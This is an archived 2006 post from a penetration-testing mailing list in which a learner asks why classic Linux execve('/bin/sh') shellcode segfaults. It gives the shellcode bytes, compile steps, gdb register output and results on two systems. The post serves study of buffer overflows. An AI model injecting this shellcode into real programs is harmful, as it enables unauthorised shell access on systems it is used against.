Penetration Testing mailing list archives

Shellcode itself segfaults

From: Paul Sebastian Ziegler <psz () observed de>
Date: Mon, 19 Jun 2006 21:06:45 +0200
Hi,

I recently ran into a problem while exploring overflowing mechanisms.
The overflowing itself is working just fine. But now I am at the point
where I want to actually inject code into my test applications so I
started searching for shellcodes to play with.
Now when I use codes for playing around (e.g. opening the cd-drive)
everything works just fine. However as soon as anything actually invokes
a shell thus becoming a real "shellcode" the shellcode itself segfaults.

As an example I have used this code contained in the paper "Buffer
Overflows Complete" from http://hackaholic.org :

-------------------------------------------------------------------------------
char main[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
-------------------------------------------------------------------------------

It is the same code that is also used in Aleph1's famous Phrack-Article
49-14.

Next I compile it successfully:
-------------------------------------------------------------------------------
$ gcc -o sh sh.c
-------------------------------------------------------------------------------

No errors here.

However when trying to run ./sh I get this:

-------------------------------------------------------------------------------
$ ./sh
Speicherzugriffsfehler (Segmentation fault)
-------------------------------------------------------------------------------

I thought of trying to find out what happens here so I fired up gdb to
check out:
-------------------------------------------------------------------------------
$ gdb -q sh
(no debugging symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
(gdb) run
Starting program: /home/tatsumori/exp/sh
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x00949e20 in __libc_start_main () from /lib/tls/libc.so.6
(gdb) backtrace
#0  0x00949e20 in __libc_start_main () from /lib/tls/libc.so.6
#1  0x080482ad in _start ()
(gdb) info reg
eax            0xa5e17c 10871164
ecx            0xbff2163c       -1074653636
edx            0x1      1
ebx            0xa5bff4 10862580
esp            0xbff215b0       0xbff215b0
ebp            0xbff21608       0xbff21608
esi            0xbff21634       -1074653644
edi            0xbff215c0       -1074653760
eip            0x949e20 0x949e20
eflags         0x10246  66118
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb)
---------------------------------------------------------------------------------

Ok, so libc seems to be canceling my code here.
This was tested on a Fedora Core 3 machine
Linux version 2.6.11-1.14_FC3 (bhcompile () bugs build redhat com) (gcc
version 3.4.3 20050227 (Red Hat 3.4.3-22)) #1 Thu Apr 7 19:23:49 EDT
2005

I also tested it on my gentoo-box with ssp and pie.
Here it is impossible to actually smash the stack, however the shellcode
itself works.

---------------------------------------------------------------------------------
% gcc -o sh sh.c
% ./sh
sh-3.1$ exit
---------------------------------------------------------------------------------

Linux version 2.6.16-hardened-r6r4h (root@localhost) (gcc バージョン
3.4.6 (Gentoo 3.4.6-r1, ssp-3.4.5-1.0, pie-8.7.9)) #10 PREEMPT Wed Jun
14 23:09:30 CEST 2006

However this is only true as long as I don't use setuid-code. Once I do
this I get exactly the same segfault on this box too.


I got the feeling that this is some kine of (maybe to) well know
standard problem so I tried google. However the only keywords I could
come up with (e.g. "shellcode setuid segfault") are conained in every
single overflowing paper so I got 100,000+ results with the first 300
being tutorials that didn't contain anything useful for me.


I would greatly appreciate it if someone could tell me what is going on
here. Or maybe give me the name/URL of some paper handling this or
giving me the right keyword to search for myself.


Thanks a lot in advance!

MfG
Paul





------------------------------------------------------------------------------
This List Sponsored by: Cenzic

Concerned about Web Application Security? 
Why not go with the #1 solution - Cenzic, the only one to win the Analyst's 
Choice Award from eWeek. As attacks through web applications continue to rise, 
you need to proactively protect your applications from hackers. Cenzic has the 
most comprehensive solutions to meet your application security penetration 
testing and vulnerability management needs. You have an option to go with a 
managed service (Cenzic ClickToSecure) or an enterprise software 
(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can 
help you: http://www.cenzic.com/news_events/wpappsec.php 
And, now for a limited time we can do a FREE audit for you to confirm your 
results from other product. Contact us at request () cenzic com for details.
------------------------------------------------------------------------------
Current thread:

Shellcode itself segfaults Paul Sebastian Ziegler (Jun 19)
- Re: Shellcode itself segfaults Justin Ferguson (Jun 19)
  - Re: Shellcode itself segfaults Peter Kosinar (Jun 20)
    - Re: Shellcode itself segfaults Ronald van der Westen (Jun 20)
    - Re: Shellcode itself segfaults Justin Ferguson (Jun 20)
    - Re: Shellcode itself segfaults Paul Sebastian Ziegler (Jun 21)